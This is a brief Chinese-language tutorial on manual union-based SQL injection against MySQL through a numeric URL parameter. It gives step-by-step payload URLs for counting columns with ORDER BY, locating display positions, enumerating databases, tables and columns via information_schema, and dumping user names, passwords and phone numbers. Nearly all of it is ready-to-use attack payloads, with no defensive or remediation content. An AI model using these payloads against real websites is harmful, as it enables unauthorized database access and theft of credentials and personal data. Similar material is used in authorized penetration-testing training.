MySQL手工注入

一些手工注入基础
(以数字型为例，字符型需要单引号'闭合)

1、oder by

http://url?id=1+order+by+{num}

num=n 正常
num=n+1 错误

2、联合查询

http://url?id=1+union+select+1,2,3,......,n+--

页面出现显示位：

显示位

3、爆破库名

http://url?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(schema_name)+from+information_schema.schemata+--

一般是放在显示位最后一位，如上所示；若放在其他显示位payload如下：

http://url?id=1+union+select+1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.schemata+--

---

数据库查询

4、爆破表名

http://url?id=1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+where+table_schema=0x776562706870{库名的16进制}+--

---

表名查询

5、爆破列名

http://url?id=1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x6563735f7573657273{表名的16进制}+--

---

列名查询

6、读取数据

http://url?id=1+union+select+1,group_concat(user_name,0x7e,password,0x7e,mobile_phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+{table_name}+--

---

读数据